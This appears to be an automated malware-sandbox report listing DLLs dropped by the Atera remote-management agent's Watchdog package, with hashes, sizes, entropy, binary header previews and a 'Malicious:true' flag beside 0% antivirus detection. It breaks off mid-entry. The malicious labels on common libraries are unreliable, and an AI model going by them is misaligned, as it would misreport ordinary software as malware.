                                                                                                                                                                                                                                        SSDEEP:768:TKsIwjxNp8hpwVeEfHuX1QUIh3kOP7oIyWb3jec/uiCR9Crw/EpYinAMxC2xD:bd8hMfHuXbIkOP7ym3jZ/uiCRgrd7HxF
                                                                                                                                                                                                                                        MD5:25CEB30BC69DC05B69F45F672AC1C1A4
                                                                                                                                                                                                                                        SHA1:63A1CC9B52CD8995EA1C17794D2F75E6F5E0B6E9
                                                                                                                                                                                                                                        SHA-256:EA390CC64028A77BA72653504499E9C0B131770DABD23D9E4AC099677B35315F
                                                                                                                                                                                                                                        SHA-512:0D6780C9B883D555BBDC25E08FAE14EBA3583484B1BBD366188CD9350EECD81B4A3433054872F81EC6B361EA794BC2A217F1A92D4ADE9A83182F7F2B4B9DEF9A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U.:..........." ..0..r............... ........... ....................................`................................./...O.......l............~..P(..........8...T............................................ ............... ..H............text....q... ...r.................. ..`.rsrc...l............t..............@..@.reloc...............|..............@..B................c.......H........:...O............................................................(-...*^.(-......G...%...}....*:.(-.....}....*:.(-.....}....*:.(-.....}....*:.(-.....}....*.~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(/...-..,..*.*.(....,.r...p......%...%...(0...*..(1...*.(....,.r...p......%...%...%...(0...*...(2...*.(....,!r...p......%...%...%...%...(0...*....(3...*..,&(....,..r...pr...p.(0...(4...*..(5...*.*.(....,.r...p......%...%...(0..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):345168
                                                                                                                                                                                                                                        Entropy (8bit):6.142154867122924
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:1pc1zjTFIfqAnI7FZVllnuJxKrSj8r2yQQLeBLPHGUdlWOAlMoBJR1TaKwQz8weI:MpTCqAn+fnw5h9hdls+IZTWcd
                                                                                                                                                                                                                                        MD5:E20A8D1854150A56856901090B816B6C
                                                                                                                                                                                                                                        SHA1:1F2C25FD9435D137ECEB81B2A74FEE6CBCEAD01A
                                                                                                                                                                                                                                        SHA-256:6D3F41537D09414352E42874430E3D44A8508F6FE843E52F124DBC279E76ECDD
                                                                                                                                                                                                                                        SHA-512:747A5B2C315E26558F99436B463DD766AD0E99F527A7836055CF5898FD7BE649ED8AC5613148D80F39AF068C2F556463CAE9A242939948F110A8A517E705B3A7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z............." ..0..............0... ...@....... ....................................`.................................S0..O....@..................P(...`......D/..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................0......H...........xZ..........|...H.............................................{....*..{....*V.(......}......}....*...0..A........u2.......4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ..<. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q5....5...-.&.+...5...o.....%..{.......%q6....6...-.&.+...6...o.....(....*..{....*..{....*..{....*r.(......}......}......}....*..0..Y........u7.......L.,G(.....{.....{....o....,/(.....{.....{....o....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710736
                                                                                                                                                                                                                                        Entropy (8bit):5.954282787995899
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:/FIM0KteTMN4Or4D3OdmZg5WHEaEDIGBBjgrIQtD+tVqDMQ:9zMTMNNd+g5Wk78GBBjgrIQtDX
                                                                                                                                                                                                                                        MD5:35FF6C65698485C13B0796ACA1E1E860
                                                                                                                                                                                                                                        SHA1:64C4DBCBFB0C81F34E3E8C5552A9B6626C740F50
                                                                                                                                                                                                                                        SHA-256:683039C3676D8437E99C0A98FB8D4C4D2D47258DAECD897F1532640B2FA82407
                                                                                                                                                                                                                                        SHA-512:E21CFF5489A6D141CE72D4639F5BCB23F18155EBD64347BD179146D53D4E99285D39E3A1B9483C697D73925B76E56E2AEAE5F63D3BB5C8E9C5B65BCC826F78BB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....)..........." ..0.............>.... ........... ....................... ............`.....................................O.......................P(..............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............9............................................................(....*^.(...........%...}....*:.(......}....*:.(......}....*.(.........*....}.....(......{.....X.....}....*....0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..o....aX...X...o....2.....cY.....cY....cY..{......{...._..+&.{|..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):285776
                                                                                                                                                                                                                                        Entropy (8bit):6.198879246365342
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:QMiAQB4wmESyxV8pj06e4isQ8gsHsjb/W1DBZ7DhsNcyZ:QMZpj06vUsMjbQ77D+B
                                                                                                                                                                                                                                        MD5:40F70FD9AA352F6954C048396533A13F
                                                                                                                                                                                                                                        SHA1:B5CACB14C795B8F03CA62A2FABA9032FAA5C5A62
                                                                                                                                                                                                                                        SHA-256:135C5B3FC4A3307FB373D466D8E0993F5899AD725AA3A04433D4CB22E205A1D0
                                                                                                                                                                                                                                        SHA-512:6AD391AD6603C4CA8A168B31968FD9DCC467D23E38A93FD616F5DF38F00A0B4152E6AA9166C37D63D96C32FEAE01DC15709F7E7F2BE37CEE3CA18F063B69EE02
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..*...........H... ...`....... ...............................T....`..................................H..O....`..L............4..P(...........G..T............................................ ............... ..H............text....(... ...*.................. ..`.rsrc...L....`.......,..............@..@.reloc...............2..............@..B.................H......H.......Xd......................TG......................................^.{....,.(G...z..}.....*^.{....,.(G...z..}.....*"..(L...*"..(M...*...0..,.......s.......}............s9...sv....{.....(....*.0..-.......s.......}............s9....s.....{.....(....*....0..(.......s.......}............s9.....{.....(....*.0..'.......s.......}............s9...sv.....(....*B...s......(....*......(....*.0..'.......s.......}............s9...sv.....(....*F...s.......(....*....0..X.........(:...}

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Hosting.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):38992
                                                                                                                                                                                                                                        Entropy (8bit):6.2961633461406645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:vdfuvOXFXW/8O6bXD+eeIgLPRsnHnyhQupytM9z7O3zfXYvj8rbPH5nTLhCPsIlc:vxuJRRsnHnyhQupytM9z7O3zfXYvj8rb
                                                                                                                                                                                                                                        MD5:318DB17FA7B98E18B6C3A6A139341D51
                                                                                                                                                                                                                                        SHA1:CF98D3D9E98D198D8E30D221EF9ADA5441A88B5E
                                                                                                                                                                                                                                        SHA-256:4D3114B2CF333C56CFAB3CD9CA3C0C16571D337B7E5EBFE72BCDA5C6BCE49E6A
                                                                                                                                                                                                                                        SHA-512:8CD7EE526136FDD48AA900193F2A3A9B0B371569D5ECD21ADF1E57A88DF275579C2C42FEC9B48549C505A605FED016696377FB5B80261EBF36706F818F9C0232
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..f..........Z.... ........... ....................................`.....................................O....................p..P(.............T............................................ ............... ..H............text...`e... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B................;.......H.......tF...=..................t.......................................2.o....s9...*6..s4...o....*..0..>.......sg......}......}......}.....-.r...ps....z....h...s....o....&.*...0..C.......sk......}.....-.r...ps....z.{....-.r...ps....z....l...s......(....*..0..{.......sm......}......}!.....}"....-.r...ps....z.{!...-.r...ps....z.(....u....} .....{ ...,..{"......+..}........n...s....o....&.*..0..U.......st......}(....-.r1..ps....z....u...s....(...+&.~....%-.&~......f...s....%...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Logging.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27728
                                                                                                                                                                                                                                        Entropy (8bit):6.552984475987511
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:iSgpZUlMxR5I1z8w3Uta2lQBVMxzMJktYm+9HWXCYBNyb8E9VF6IYinAM+oCKtKL:iSCZUl2O1zCnXyzD6EpYinAMxCk/kp
                                                                                                                                                                                                                                        MD5:DB2C92A173A2A0373A1F8190E95FA17F
                                                                                                                                                                                                                                        SHA1:FE61CB7B6B8E90E438F17A58775F3A70235744CA
                                                                                                                                                                                                                                        SHA-256:DD3547F40D823D6B0462C9C11CFAEDF306E01782BF28AEA9B0C31DF6812D7E81
                                                                                                                                                                                                                                        SHA-512:66BE8021026769C4509577F77650DD4D20C50EBDC6111342AB91A0C590118E5288B5524E6AF104B1505602231B3B14830E318563FA83F1F1D13C9F06CDEAE86D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....m..........." ..0..:..........vX... ...`....... ..............................e&....`................................."X..O....`..h............D..P(...........W..T............................................ ............... ..H............text...|8... ...:.................. ..`.rsrc...h....`.......<..............@..@.reloc...............B..............@..B................VX......H.......H...H(...................V........................................(....*..(....*..-.r...ps....z.-.r...ps....z..s......o....*v.-.r1..ps....z...s....o.....*...0..V.......s.......}.....-.rA..ps....z.,..o......./...s....(...+&+...{.....s....(....&...(...+&.*...0...........-.rQ..ps....z.o.... ....1..{.....o....*.{.....o....t......,..*.{.....o......{..........(.....{....o.... ....3..{....o ....{......o!......,..(".....*.........U.4.........s#...}.....s$...}.....s%...}.....(

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):41552
                                                                                                                                                                                                                                        Entropy (8bit):6.321380010408937
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:MUqoXsEgfFHoiikZ9y3BHdD+XR/tGo06BWEpYinAMxCD:jLrgfPw3mXREaX7Hxc
                                                                                                                                                                                                                                        MD5:680AFEE0D0AE8CBE3C14E8B2E98331A0
                                                                                                                                                                                                                                        SHA1:A4536CA35F55179DCFAF8507D8BED284F8A87285
                                                                                                                                                                                                                                        SHA-256:9BECD7633640CCA28369CE850BE2F2EB7F3D41B32289D7E4D99FD53E014844F5
                                                                                                                                                                                                                                        SHA-512:586B4D5AB7274E0BBD26CA7B6A08A39D83CCA6B134523342094F0159E42873AF987908DAF52B7947402288E7C399C78EB63658C3591C708A24B7270936B16F5C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z..........." ..0..p............... ........... ..............................5|....`....................................O....................z..P(.............T............................................ ............... ..H............text...$n... ...p.................. ..`.rsrc................r..............@..@.reloc...............x..............@..B........................H........<...O..................X.........................................(....*^.(.......D...%...}....*:.(......}....*:.(......}....*...0..,.............................................(....*.0..*...........................................(....*...0..(.........................................(....*.0..&.......................................(....*...0..S........-.r...ps....z.-.r%..ps....z.-.r/..ps....z...s ..............................(....*..0..V........-.r...ps....z.-.rM.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138320
                                                                                                                                                                                                                                        Entropy (8bit):6.160416546932122
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:cobKO7RaoWuUeZk/f0Sh1HlWZm1ZZTdyGFkNUMT+P65jDtYQn:JbKKz1UeZk/Phv8lDuPaf
                                                                                                                                                                                                                                        MD5:347415351ACC3FA1BB4B12FE70D8DB3E
                                                                                                                                                                                                                                        SHA1:CD659D48CA294880D2A950521869E3629B680873
                                                                                                                                                                                                                                        SHA-256:72A60990CB728C500FEDB1A6BC89D8EDF4661C89FBE3B899A7D8B2674C59CA1C
                                                                                                                                                                                                                                        SHA-512:CB8EE748F5604EB81299B48B8C0225B1C9FB557472112CB576304E6A52BDF4343BF28F1169E4B60C60357D26910004012D136997C165E226E1B5FECDC397F878
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....\..........." ..0.............6.... ... ....... .......................`......j.....`.....................................O.... ..................P(...@..........T............................................ ............... ..H............text...<.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......h...0O............................................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. ... )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0..b........r...p......%..{)......%q.........-.&.+.......o2....%..{*......%q.........-.&.+.......o2....(3...*..{4...*..{5...*V.(+.....}4.....}5...*.0..;........u......,/(,....{4....{4...o-...,.(.....{5....{5...o/...*.*. .T.2 )UU.Z(,....{4...o0

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):150096
                                                                                                                                                                                                                                        Entropy (8bit):6.238069789487319
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:c0B07tjJYVNSCn+tn3nUMI000000I+49U2BL1krvm:v07iSqSnkMDjyC
                                                                                                                                                                                                                                        MD5:06740FA9E73A184DCEF81A0F9964BC0B
                                                                                                                                                                                                                                        SHA1:E0D18EFACEE6AA0431EFBA2ABD4F0BB34E47BB41
                                                                                                                                                                                                                                        SHA-256:91A4499366A332F2EA2EAAF8CCB1B67582553E8ADF067DE6D3FDC4D8B4389071
                                                                                                                                                                                                                                        SHA-512:B021F4ACDF88EB321981278F8F38D385D200227C975C3A289B2D1BB2D948C5336B78196119B07CCE8C6312926F9F1DE07CB5D0A8D4ADF979C664C8B8A25CB805
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#9..........."!..0..............4... ........@.. ...................................`..................................4..W....@..............."..P(...`.......3..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................4......H...........lV............................................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*.0..K........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X(..... ...._.S...(......d.S*..0..&.........+....(....G...Z.(......X....(....2.*...0..L.........(..........(.....Z.(......(.....s....~....%-.&~..........s....%.....(...+*...0Y..5...0Y*..aY.5...aY..X* ....*V..0Y..6...aY......*.*.s.........*..(....*....0..&...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.EventLog.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):52816
                                                                                                                                                                                                                                        Entropy (8bit):6.18197692498772
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:NtgEqel7clEfRWOuDXaVIWb0TadZjirgFDrGfmAXOaYbMlfEpYinAMxCr:NiprEfsOuD0hhji6DrLbAY7Hxk
                                                                                                                                                                                                                                        MD5:161E234AD2B220206DB6341B670DBD06
                                                                                                                                                                                                                                        SHA1:B5EAA6BE5BE77227139F2298312A406EC959ADBD
                                                                                                                                                                                                                                        SHA-256:DF6ABCE21AEDCF0106303877C88F0039C52BB5C5B98B537D9C079874965E9875
                                                                                                                                                                                                                                        SHA-512:4999FC5AE69EF904460794C33D9E5642ED2E47A4104C6DC3CF958DC524159F59D3335547BCA5EFB182D87773124BC6E35C524B2488CE0EEBA351BE5FAF3DC5C4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L..........." ..0.............Z.... ........... ...............................s....`.....................................O.......................P(..............T............................................ ............... ..H............text...`.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................;.......H.......<5..,m..........h...0.............................................()...*:.().....}....*.~....*...0..........(....,..*..(.....o*......&...*...................0...........(.......(+...-..,..*.*.(....,.r...p......%...%...(,...*..(-...*.(....,.r...p......%...%...%...(,...*...(....*.(....,!r...p......%...%...%...%...(,...*....(/...*..,&(....,..r...pr...p.(,...(0...*..(1...*.*.(....,.r...p......%...%...(,...*...(2...*.(....,.r...p......%...%...%...(,...*....(3...*.(....,"r.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.ServiceProcess.ServiceController.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34896
                                                                                                                                                                                                                                        Entropy (8bit):6.290935546349103
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:K3wGplLcGsTK/lWNVz7MW+N92D1NlteVXEpYinAMxCwU:K3wMZ1lWL7MW+N0peVQ7HxRU
                                                                                                                                                                                                                                        MD5:7D9DF905042D334B4A966BD1AA8FB08B
                                                                                                                                                                                                                                        SHA1:3ECC8AD781DB2F3A01C09993BE7D31A878AF4105
                                                                                                                                                                                                                                        SHA-256:7C6F7FF7350CDAD1F7025CB1B0FFADBCA99F801C7D0B9C2F11F5A9AE2F2E53A7
                                                                                                                                                                                                                                        SHA-512:BF17D7A918469726B0325AE2BB35C00D1D5BF3BDA73FDF0397A432F271630A4CCEC2B4A30A677697F1E34AAE81D8FB37A076581C8B78C35B28141AE5ABFEE53D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O............" ..0..T..........6r... ........... ..............................V.....`..................................q..O....... ............`..P(...........p..T............................................ ............... ..H............text...<R... ...T.................. ..`.rsrc... ............V..............@..@.reloc...............^..............@..B.................r......H........(..h6..........$_..8...\p........................................(....*^.(.......7...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*.~....*..0..........(....,..*..(.....o ......&...*...................0...........(.......(!...-..,..*.*.(....,.r...p......%...%...("...*..(#...*.(....,.r...p......%...%...%...("...*...($...*.(....,!r...p......%...%...%...%...("...*....(%...*..,&(....,..r...pr...p.("...(&...*..('...*.*.(....,.r...p......%...%...("..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Text.Encodings.Web.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):71248
                                                                                                                                                                                                                                        Entropy (8bit):6.13173802618335
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:pQuedlunqpC9yYxC9P7tt08eeykGlsESo3+7Hxr:g3KICHxC9ZJexRsG3+x
                                                                                                                                                                                                                                        MD5:F85B82A5B08CCAA5359DF86C5A7EAF68
                                                                                                                                                                                                                                        SHA1:6CA8520D247CF38F1D885B987B77892CC94397F6
                                                                                                                                                                                                                                        SHA-256:EF4402FA640506310B85D639DFB2848DBA25DC9AFA331088F8EFB7F0877EE8C8
                                                                                                                                                                                                                                        SHA-512:ADAD4A9E3BC20726986FBA733EA1C2A3490E1C15A92E339A4E0F187EBF0BABFB598F02CEFBB9F54A50343150E365F0D47B31A06054864D8C48ECD5F58445E31A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n..........."!..0.................. ........@.. .......................`...........`.....................................O.... ..................P(...@..........T............................................ ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............w...........d................................................(....*^.(...........%...}....*:.(......}....*:.(......}....*^.(...........%...}....*:.(......}....*....0..E........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X(......R...(......d.R*....0..K........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X(..... ...._.S...(......d.S*f..._....0X....91...X....*.~....*.0..........(....,..*..(.....o.......&...*..................~~....%-.&.....(....s....%.....*.r...p(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Text.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):543312
                                                                                                                                                                                                                                        Entropy (8bit):5.987161302939433
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:a6+HbUMHVgQO61+5ZpvsQ60OghEusa4UQgce0x7KjF76pkLzLFEnJEIfibgPKiU5:a6aRgsgfEU4UDcxkLzJEBsgPKiUYFHsv
                                                                                                                                                                                                                                        MD5:76B3958BBDDF8E1A58B08581EB4B5CC2
                                                                                                                                                                                                                                        SHA1:B51FFBD175BF70D20C4184FEF53764966DAB2393
                                                                                                                                                                                                                                        SHA-256:0C13A1B28BAFB47ADB5D8B9E86923116258CB4E4CCB3C84310B360D4D004C145
                                                                                                                                                                                                                                        SHA-512:7B43FA7B09C19B01E96B94028EF9EBE4CF44339437A517011702239BA247189F0D3EE8449E6913F82A41E86BA7E80CDFC9ADA9E7DE5423A38F0DBC434725588E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B............."!..0..............3... ........@.. ..............................%.....`.................................h3..S....@..............."..P(...`.......2..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................3......H...........s...........C...w..H.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*.0..&........(.......(..../.(........(....G* ....*...0..@.......(.....3'..0Yn.!.~...~...i.?_b...@jY..._.j2..*.*.(.... .........*B..... ....s....*.~....*.0..........(....,..*..(.....o.......&...*...................(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\de\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9728
                                                                                                                                                                                                                                        Entropy (8bit):4.560006548424685
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:AiWWNv/jzSENtqcadVl8PandjJUf7ZJSqSi/ufPU1S5rxg0XWr:v1Nvb5adVl8P2djJMZJSGu3z5rxg0XWr
                                                                                                                                                                                                                                        MD5:63E9B310597AC25A1CEAA55B6F0CC9F3
